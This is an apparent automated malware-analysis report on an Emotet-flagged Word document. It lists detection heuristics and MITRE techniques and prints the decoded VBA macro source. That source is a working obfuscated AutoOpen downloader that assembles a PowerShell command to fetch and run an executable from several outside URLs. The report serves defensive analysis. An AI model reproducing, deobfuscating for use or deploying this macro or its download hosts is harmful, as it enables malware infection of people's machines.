MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains a critical ClamAV detection for Emotet, along with medium-severity heuristics indicating the presence of legacy and standard VBA macros, including an AutoOpen macro. The AutoOpen subroutine in the VBA script attempts to execute a command-line payload using 'cmd.exe', which is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV signature specifically names Emotet, supporting this family attribution.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6884106-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884106-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4231 bytes |
SHA-256: 4e93c9b3d50dfbffa52958a20c2f0bb26984cf420b07a03da68a78c4d56038dc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SszqwTK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim FFQUZc()
ReDim FFQUZc(5)
FFQUZc(0) = 5
FFQUZc(1) = 1
FFQUZc(2) = 22
FFQUZc(3) = 1220
FFQUZc(4) = 41
Dim mSHYrf()
ReDim mSHYrf(5)
mSHYrf(0) = 733
mSHYrf(1) = 75
mSHYrf(2) = 67415281
mSHYrf(3) = 25
mSHYrf(4) = 1579
Dim fskVp()
ReDim fskVp(2)
fskVp(0) = 1244
fskVp(1) = 591
Dim jTroY()
ReDim jTroY(5)
jTroY(0) = 13
jTroY(1) = 27
jTroY(2) = 8128
jTroY(3) = 119003862
jTroY(4) = 4349
Dim MPaKZ()
ReDim MPaKZ(4)
MPaKZ(0) = 379641608
MPaKZ(1) = 46911394
MPaKZ(2) = 38
MPaKZ(3) = 654
Shell@ rovZMtIkZJb + YrOoGfHklwYKir + NjDswvUBmiEEzR, Format(0)
Dim YXIwWR()
ReDim YXIwWR(5)
YXIwWR(0) = 30
YXIwWR(1) = 95
YXIwWR(2) = 5
YXIwWR(3) = 302634732
YXIwWR(4) = 7
Dim NivzZ()
ReDim NivzZ(2)
NivzZ(0) = 90
NivzZ(1) = 1
End Sub
Attribute VB_Name = "VHbwtETzcXNCY"
Function rovZMtIkZJb()
On _
Error _
Resume _
Next
Dim FqHTRA()
ReDim FqHTRA(5)
FqHTRA(0) = 49
FqHTRA(1) = 4997
FqHTRA(2) = 96534893
FqHTRA(3) = 86
FqHTRA(4) = 8583
Dim tsTJGE()
ReDim tsTJGE(4)
tsTJGE(0) = 556
tsTJGE(1) = 4
tsTJGE(2) = 1
tsTJGE(3) = 388606671
Dim wNpfu()
ReDim wNpfu(4)
wNpfu(0) = 68
wNpfu(1) = 3087
wNpfu(2) = 3
wNpfu(3) = 4
baBkpb = Format(Chr(14 + 7 + 8 + 8 + 62)) + "md /V:/" + Format(Chr(10 + 5 + 5 + 5 + 42)) + Format(Chr(4 + 2 + 2 + 2 + 24)) + "s" + "^e^t ^y^k=^ ^ " + " ^ ^ }^}{h" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "ta" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^" + "}^;^k^a^er^b;^i^b^Q^$ m" + "etI-^e^k^ovn^I;" + ")i^b^Q$ ,rvv$(e^li^F" + "^d^ao^lnw^o^D^.M^w^H${^yr^" + "t^{)uB^w$ n^i^ rvv^$(^h" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "ae" + "r^o^f;^'ex^e.'+RVE"
Dim mwcjF()
ReDim mwcjF(5)
mwcjF(0) = 9067
mwcjF(1) = 23657316
mwcjF(2) = 6
mwcjF(3) = 6
mwcjF(4) = 21
Dim zEIMY()
ReDim zEIMY(2)
zEIMY(0) = 6279
zEIMY(1) = 471557024
Dim dvpCY()
ReDim dvpCY(3)
dvpCY(0) = 192
dvpCY(1) = 351
dvpCY(2) = 334177786
mwOfuLCt = "$^+'^\'" + "^+" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "il^bup^:vne$=i^b^Q^$;^'^5" + "9^6^' = RV^E^$^;)^'@'(ti^" + "l^p^S^.^" + "'s1^tGSL^7r" + "^9j/^ti^" + ".^iz^i^t^a^m^a//^:^p^tth@^m^AW" + "^QuG^f/" + "mo" + Format(Chr(14 + 7 + 8 + 8 + 62)) + ".n^" + "wote^pa" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^gnir^o^olf^et" + "^an^im^a^l//:^pt^t^h@hQu4U^k" + "^OQ/^e^d^." + "^ten^e^s^o^o^g//:^ptt^h"
Dim iCqkYf()
ReDim iCqkYf(2)
iCqkYf(0) = 548
iCqkYf(1) = 4
Dim Wzpfz()
ReDim Wzpfz(5)
Wzpfz(0) = 80
Wzpfz(1) = 167892834
Wzpfz(2) = 9035
Wzpfz(3) = 8
Wzpfz(4) = 2
Dim YhODj()
ReDim YhODj(5)
YhODj(0) = 797
YhODj(1) = 9
YhODj(2) = 798
YhODj(3) = 86622295
YhODj(4) = 2949
kNSOMtOjXo = "@^EqFQb^ZYr^w^Y/^mo" + Format(Chr(14 + 7 + 8 + 8 + 62)) + ".s^m^ets^ys^-^fe^i" + "l^e^b//^:^" + "p^tth@v^mdup^mLR^SF/o^fn^i^" + ".^gno^s" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^u^htnei^k." + "zra^ts^p" + "o^pk//" + "^:^p^tt^h'^=u^B^w$^;tnei^l" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "^be" + "^W^.teN^" + " ^t" + Format(Chr(14 + 7 + 8 + 8 + 62)) + "^ej^b^o-^wen=^MwH" + "^$^ l^l^e^h^s" + "re^w^o^p&&^f^o" + "r /^L %^0 ^i"
Dim hTToi()
ReDim hTToi(3)
hTToi(0) = 228
hTToi(1) = 801
hTToi(2) = 8569
Dim tMopO()
ReDim tMopO(4)
tMopO(0) = 52
tMopO(1) = 101626129
tMopO(2) = 223
tMopO(3) = 462115113
FjOdQTYubXn = "n (3^9^3^,-1^,0)^do ^set ^" + "s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P=!^s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P!!" + "^y^k:~%^0" + ",1!&&^i^f %^0 ^ls^s ^1 " + Format(Chr(14 + 7 + 8 + 8 + 62)) + "a" + "^l^l %^s^Q" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "P:^*^sQ" + Format(Chr(10 + 5 + 5 + 5 + 42)) + "^P" + "^!^=%" + Format(Chr(4 + 2 + 2 + 2 + 24)) + ""
rovZMtIkZJb = baBkpb + mwOfuLCt + kNSOMtOjXo + FjOdQTYubXn
Dim XojQV()
ReDim XojQV(3)
XojQV(0) = 35055573
XojQV(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.